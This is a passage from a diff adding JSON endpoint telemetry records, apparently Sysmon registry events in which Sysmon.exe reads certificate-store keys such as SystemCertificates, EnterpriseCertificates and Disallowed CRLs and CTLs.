"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866530000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866530000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, 
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 